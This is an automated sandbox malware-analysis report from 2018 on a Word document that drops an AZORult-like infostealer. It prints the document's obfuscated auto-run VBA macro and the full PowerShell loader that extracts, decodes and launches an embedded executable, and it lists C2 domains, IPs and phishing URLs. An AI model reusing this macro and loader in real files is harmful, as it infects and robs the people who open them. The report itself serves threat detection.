aa317af7a2307040e7fd3a4a1df33430 (1).zip
This report is generated from a file or URL submitted to this webservice on February 16th 2018 17:41:40 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v7.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware: POSTs files to a webserver
- Evasive: Possibly checks for the presence of an Antivirus engine
- Network Behavior: Contacts 1 domain and 1 host
Additional Context
Related Sandbox Artifacts
- Associated SHA256s: a092584ac514bf4b9d3d58d7ce8261b3329a327055784840dc9a4ab5e12ad890
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (12)

External Systems

Detected Suricata Alert
- Details:
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no accept headers" (SID: 2022985, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN AZORult Variant Checkin" (SID: 2821358, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "CrowdStrike Azorult V1 traffic" (SID: 181717601, Rev: 20171116, Severity: 1) categorized as "A Network Trojan was detected"
- Source: Suricata Alerts
- Relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- Details: 9/59 Antivirus vendors marked sample as malicious (15% detection rate)
- Source: External System
- Relevance: 8/10
General

The analysis extracted a file that was identified as malicious
- Details: 28/67 Antivirus vendors marked dropped file "TAMOIV.exe" as malicious (classified as "Trojan.Agent" with 41% detection rate)
- Source: Binary File
- Relevance: 10/10

The analysis spawned a process that was identified as malicious
- Details:
28/67 Antivirus vendors marked spawned process "TAMOIV.exe" (PID: 3716) as malicious (classified as "Trojan.Agent" with 41% detection rate)
28/67 Antivirus vendors marked spawned process "TAMOIV.exe" (PID: 2192) as malicious (classified as "Trojan.Agent" with 41% detection rate)
- Source: Monitored Target
- Relevance: 10/10
Installation/Persistence

Sets thread context in a remote process (often injection or process hollowing)
- Details: "TAMOIV.exe" set thread context in remote process "%TEMP%\TAMOIV.exe" (PID 00000890)
- Source: API Call
- Relevance: 10/10

Writes data to a remote process
- Details:
"WINWORD.EXE" wrote 32 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"WINWORD.EXE" wrote 52 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"WINWORD.EXE" wrote 4 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 1308)
"powershell.exe" wrote 32 bytes to a remote process "%TEMP%\TAMOIV.exe" (Handle: 1160)
"powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 1160)
"powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 1160)
"TAMOIV.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192)
"TAMOIV.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192)
"TAMOIV.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\AppData\Local\Temp\TAMOIV.exe" (Handle: 192)
- Source: API Call
- Relevance: 6/10
Network Related

Malicious artifacts seen in the context of a contacted host
- Details:
Found malicious artifacts related to "104.168.177.9": ...
URL: http://doc2docs.net/docusign/pro (AV positives: 6/67 scanned on 02/16/2018 16:05:01)
URL: http://vicmaxcgi.com/Fix/stripe.com/account (AV positives: 8/67 scanned on 02/16/2018 10:17:14)
URL: http://vicmaxcgi.com/ (AV positives: 5/67 scanned on 02/16/2018 08:43:39)
URL: http://doc2docs.net/ (AV positives: 5/67 scanned on 02/16/2018 08:35:27)
URL: http://stevture.com/click/stripe.com/account/ (AV positives: 6/67 scanned on 02/16/2018 08:09:03)
File SHA256: c515ece145248824c62296e3b9c52c6d2fa4a49b9033fe42ea959971886d9ca1 (AV positives: 20/60 scanned on 02/16/2018 16:05:06)
File SHA256: 312ba50c922bc52ea7223b150c6c6e8c99e5d2a9be705e6dd96b756f6c96f75e (AV positives: 3/68 scanned on 01/24/2018 22:04:53)
File SHA256: f14488deb49d10be5c70c980583cdce74e840d13def570151ceb2143a9a956a8 (AV positives: 4/60 scanned on 01/23/2018 18:26:03)
File SHA256: 9139c211c455c74cf3c0d545303a112492a6724df4c8fa54f63262cfeaeaccec (AV positives: 3/70 scanned on 11/27/2017 01:54:59)
File SHA256: 0e3fa4f47278bf6ef916418d951db86c786ab3593a42827ed5713d58e6fb5cd8 (AV positives: 4/71 scanned on 11/04/2017 22:41:03)
- Source: Network Traffic
- Relevance: 10/10
Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- Details: Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- Source: Static Parser
- Relevance: 10/10

Contains embedded string that indicates auto-execute behavior
- Details: Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- Source: File/Memory
- Relevance: 10/10
Hiding 3 Malicious Indicators (available only in the private webservice or standalone version)
Suspicious Indicators (14)

Anti-Detection/Stealthiness

Creates a resource fork (ADS) file (often used to hide data)
- Details: "powershell.exe" created file "%TEMP%\f.doc:Zone.Identifier"
- Source: API Call
- Relevance: 8/10

Possibly checks for the presence of an Antivirus engine
- Details: "ComodoDragon" (Indicator: "comodo")
- Source: File/Memory
- Relevance: 3/10
Anti-Reverse Engineering

Looks up many procedures within the same disassembly stream (often used to hide usage)
- Details:
Found 47 calls to GetProcAddress@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
Found 11 calls to GetProcAddress@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 10/10
General

Contains ability to find and load resources of a specific module
- Details:
FindResourceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
FindResourceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 1/10

POSTs files to a webserver
- Details:
"POST /conto/gate.php HTTP/1.1" with headers Host: eualube.com; User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; Referer: eualube.com/conto/gate.php; Connection: close; Content-Length: 264; Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0 (with no payload)
"POST /conto/gate.php HTTP/1.1" with headers Host: eualube.com; User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; Referer: eualube.com/conto/gate.php; Connection: close; Content-Length: 674; Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0 (with no payload)
- Source: Network Traffic
- Relevance: 5/10
Installation/Persistence

Creates new processes
- Details:
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 1308)
"powershell.exe" is creating a new process (Name: "%TEMP%\TAMOIV.exe", Handle: 1160)
"TAMOIV.exe" is creating a new process (Name: "%TEMP%\TAMOIV.exe", Handle: 192)
- Source: API Call
- Relevance: 8/10

Drops executable files
- Details: "TAMOIV.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- Source: Binary File
- Relevance: 10/10
Network Related

Uses a User Agent typical for browsers, although no browser was ever launched
- Details: Found user agent(s): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
- Source: Network Traffic
- Relevance: 10/10
Spyware/Information Retrieval

Contains ability to retrieve keyboard strokes
- Details: GetKeyboardState@USER32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 8/10
Unusual Characteristics

Contains embedded VBA macros with suspicious keywords
- Details:
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
- Source: Static Parser
- Relevance: 10/10

Installs hooks/patches the running process
- Details:
"WINWORD.EXE" wrote bytes "e9603334ec" to virtual address "0x75684731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "245b9b89" to virtual address "0x5A0D9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e9239936ec" to virtual address "0x75685DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "c4ca3c7780bb3c77aa6e3d779fbb3c7708bb3c7746ce3c7761383d77de2f3d77d0d93c770000000017790f774f910f777f6f0f77f4f70f7711f70f77f2830f77857e0f7700000000" to virtual address "0x73601000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "3b7b9589" to virtual address "0x5B4C10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e99e485bea" to virtual address "0x773D3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "bd0e2d89" to virtual address "0x695CCA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "82412d89" to virtual address "0x62D4F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "e99a5433ec" to virtual address "0x75683E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9365534ec" to virtual address "0x75683EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba0c82e60468dcf5026ac3" to virtual address "0x04E65B44"
"WINWORD.EXE" wrote bytes "093874e7" to virtual address "0x693D42C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e9c53244ec" to virtual address "0x75B26143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "952dc189" to virtual address "0x61BE0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "0a2c2d89" to virtual address "0x670D78E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b2c6838a" to virtual address "0x2FB11B94" (part of module "WINWORD.EXE")
"powershell.exe" wrote bytes "7ec6b0e6" to virtual address "0x68B91FDC" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "4053267758582777186a2777653c28770000000000bf3c770000000056cc3c77000000007cca3c7700000000376843756a2c2877d62d287700000000206943750000000029a63c7700000000a48d437500000000f70e3c7700000000" to virtual address "0x76B61000" (part of module "NSI.DLL")
"powershell.exe" wrote bytes "0857d0750478d9750000000051c1ab769498ab76ee9cab7675dcad76273ead76efb2b1760000000046ce3c77013d3d7738ed3d77cfcd3c7731233c77de2f3d77c4ca3c7780bb3c77aa6e3d779fbb3c7792bb3c7746ba3c770abf3c7700000000" to virtual address "0x73631000" (part of module "SHFOLDER.DLL")
"TAMOIV.exe" wrote bytes "92e6237779a82877be722877d62d28771de2237705a22877bee32377616f2877684126770050267700000000ad378b758b2d8b75b6418b7500000000" to virtual address "0x74881000" (part of module "WSHTCPIP.DLL")
- Source: Hook Detection
- Relevance: 10/10

Spawns a lot of processes
- Details:
Spawned process "WINWORD.EXE" with commandline "/n "C:\aa317af7a2307040e7fd3a4a1df33430.doc""
Spawned process "powershell.exe" with commandline "Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');"
Spawned process "TAMOIV.exe"
Spawned process "TAMOIV.exe"
Spawned process "DW20.EXE" with commandline "-x -s 1420"
- Source: Monitored Target
- Relevance: 8/10
Hiding 2 Suspicious Indicators (available only in the private webservice or standalone version)
Informative (25)

Environment Awareness

Contains ability to query machine time
- Details: GetLocalTime@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 1/10

Contains ability to query the machine version
- Details:
GetVersionExA@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
GetVersion@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
GetVersion@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 1/10

Contains ability to query the system locale
- Details: GetUserDefaultLCID@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 1/10

Contains ability to query volume size
- Details: GetDiskFreeSpaceA@KERNEL32.DLL from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 3/10

Makes a code branch decision directly after an API that is environment aware
- Details:
Found API call GetVersion@KERNEL32.DLL (Target: "TAMOIV.exe"; Stream UID: "00019790-00003716-27388-2792-00450E10") which is directly followed by "cmp ax, 0004h" and "jc 00450FC6h". See related instructions: "... +151 call 00404314h; +156 call 00406420h ;GetVersion; +161 and eax, 000000FFh; +166 cmp ax, 0004h; +170 jc 00450FC6h ..." from TAMOIV.exe (PID: 3716)
Found API call GetVersion@KERNEL32.DLL (Target: "TAMOIV.exe"; Stream UID: "00019790-00003716-27388-2748-0044C794") which is directly followed by "cmp ax, 0004h" and "setnb byte ptr [00479B18h]". See related instructions: "... +26 call 00406420h ;GetVersion; +31 and eax, 000000FFh; +36 cmp ax, 0004h; +40 setnb byte ptr [00479B18h] ..." from TAMOIV.exe (PID: 3716)
- Source: Hybrid Analysis Technology
- Relevance: 10/10
General

Contacts domains
- Details: "eualube.com"
- Source: Network Traffic
- Relevance: 1/10

Contacts server
- Details: "104.168.177.9:80"
- Source: Network Traffic
- Relevance: 1/10

Contains PDB pathways
- Details:
"G.PdBGF<Njf[[\5GWORGRG"f2fF<GjW5dBGG-{W
RGRGRG.wcBG7W-W-WGSW-W-WGvcBGCv"
- Source: File/Memory
- Relevance: 1/10

Contains SQL queries
- Details:
"INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);"
"UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;"
"UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;"
- Source: File/Memory
- Relevance: 2/10

Contains embedded VBA macros
- Details: File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code:
Private Sub Document_Open()
Dim pg, bl As String
Dim fE As Long
Dim qu As String
Dim aD() As Byte
qu = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
aD = StrConv(qu, vbFromUnicode)
For fE = 0 To UBound(aD)
aD(fE) = aD(fE) - 7
Next fE
pg = StrConv(aD, vbUnicode)
bl = StrReverse(pg)
Shell (Replace(Replace(Split(bl, Chr(124))(1), Split(bl, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
- Source: Static Parser
- Relevance: 10/10

Contains embedded VBA macros (normalized)
- Details: Normalized macro string: "Private Sub Document_Open() Dim pg, bl As String Dim fE As Long Dim qu As String Dim aD() As Byte qu = ThisDocument.BuiltInDocumentProperties(Title) aD = StrConv(qu, vbFromUnicode) For fE = 0 To UBound(aD) aD(fE) = aD(fE) - 7 Next fE pg = StrConv(aD, vbUnicode) bl = StrReverse(pg) Shell (eplace(eplace(Split(bl, |)(1), Split(bl, |)(0), .), FPATH, ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0End Sub"
- Source: File/Memory
- Relevance: 10/10
Creates a writable file in a temporary directory
- Details:
"WINWORD.EXE" created file "%TEMP%\~DFF7EC200435B29474.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF5463ED2E244C574A.TMP"
"powershell.exe" created file "%TEMP%\f.doc"
"powershell.exe" created file "%TEMP%\f.doc:Zone.Identifier"
"powershell.exe" created file "%TEMP%\TAMOIV.exe"
- Source: API Call
- Relevance: 1/10

Creates mutants
- Details:
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58022"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-58022"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\DBWinMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZoneAttributeCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\10MU_ACB10_S-1-5-5-0-58022"
"Local\ZonesLockedCacheCounterMutex"
- Source: Created Mutant
- Relevance: 3/10
Loads rich edit control libraries
- Details: "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5A090000
- Source: Loaded Module

Loads the .NET runtime environment
- Details: "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 65A50000
- Source: Loaded Module

Process launched with changed environment
- Details:
Process "powershell.exe" was launched with new environment variables: "WecVersionForRosebud.22C="4""
Process "TAMOIV.exe" was launched with modified environment variables: "PSModulePath"
Process "DW20.EXE" was launched with modified environment variables: "PSModulePath"
- Source: Monitored Target
- Relevance: 10/10

Scanning for window names
- Details:
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
- Source: API Call
- Relevance: 10/10

Spawns new processes
- Details:
Spawned process "powershell.exe" with commandline "Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');"
Spawned process "TAMOIV.exe"
Spawned process "TAMOIV.exe"
Spawned process "DW20.EXE" with commandline "-x -s 1420"
- Source: Monitored Target
- Relevance: 3/10
Installation/Persistence

Contains ability to look up the Windows account name
- Details: GetUserNameW@ADVAPI32.DLL from TAMOIV.exe (PID: 2192)
- Source: Hybrid Analysis Technology
- Relevance: 5/10

Dropped files
- Details:
"aa317af7a2307040e7fd3a4a1df33430.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Sat Feb 17 00:42:47 2018 mtime=Sat Feb 17 00:42:47 2018 atime=Sat Feb 17 00:43:00 2018 length=1369092 window=hide"
"~$317af7a2307040e7fd3a4a1df33430.doc" has type "data"
"aa317af7a2307040e7fd3a4a1df33430.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Sat Feb 17 00:42:47 2018 mtime=Sat Feb 17 00:42:47 2018 atime=Sat Feb 17 00:43:00 2018 length=1369092 window=hide"
"TAMOIV.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"Desktop" has type "empty"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa Author: Caleb Cheng Template: Normal Last Saved By: caive Revision Number: 60 Name of Creating Application: Microsoft Office Word Total Editing Time: 46:00 Create Time/Date: Sat Feb 3 02:00:00 2018 Last Saved Time/Date: Fri Feb 16 01:17:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 1 Security: 0"
"MSO3081.acl" has type "data"
"~WRD0002.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa Author: Caleb Cheng Template: Normal Last Saved By: caive Revision Number: 60 Name of Creating Application: Microsoft Office Word Total Editing Time: 48:00 Create Time/Date: Sat Feb 3 02:00:00 2018 Last Saved Time/Date: Fri Feb 16 01:17:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 3 Security: 0"
"~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp" has type "data"
"1571463673.cvr" has type "data"
"~$Normal.dotm" has type "data"
"6LACNQ6NXQXSDUZITFDL.temp" has type "data"
- Source: Binary File
- Relevance: 3/10

Opens the MountPointManager (often used to detect additional infection locations)
- Details: "WINWORD.EXE" opened "\Device\MountPointManager"
- Source: API Call
- Relevance: 5/10

Touches files in the Windows directory
- Details:
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp"
- Source: API Call
- Relevance: 7/10

Network Related

Found potential URL in binary/memory
- Details:
Heuristic match: "KPcu={+:9//>].gE"
Pattern match: "http://ns.adobe.com/xap/1.0/"
Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
Pattern match: "xczg-.BIe/%/WqI"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "eualube.com/conto/gate.php"
Heuristic match: "eualube.com"
Heuristic match: "6 Y:6(8mmmmBK3^*>@)k7.aT"
Pattern match: "H.vP/62g[mmmm"
Pattern match: "NBmmmmjc.YrM/8[Ndu+.g}bXRR|4mmmm`=und}6+7IM"
Pattern match: "kY.wpxu/mmmmJd"
Heuristic match: "G*.BB"
Heuristic match: "lRIJlYXU]`:slX6&^vXVv&XRI)v`lXUB]IIlUIU\llUB_9IRWB_MIRW]`$AUZ*EXUIf.Rw"
Heuristic match: "IGX[Wa[_WoGy[wW'GWG-G?GQG[WCCCCCCCCCzCpCbCCCRCRC@C.CC"
Pattern match: "WWw.v.f2fCkjW5O5XUW]`\j&5ZU5&5SXU\dINvI=&S_[[]`aOKUMGCSjf[[\5POHGLf[[\5y"
- Source: File/Memory
- Relevance: 10/10

System Security

Hooks API calls
- Details:
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
- Source: Hook Detection
- Relevance: 10/10

Modifies proxy settings
- Details:
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- Source: Registry Access
- Relevance: 10/10
File Details
- Filename: aa317af7a2307040e7fd3a4a1df33430.doc
- Size: 1.3MiB (1369092 bytes)
- Type: doc office
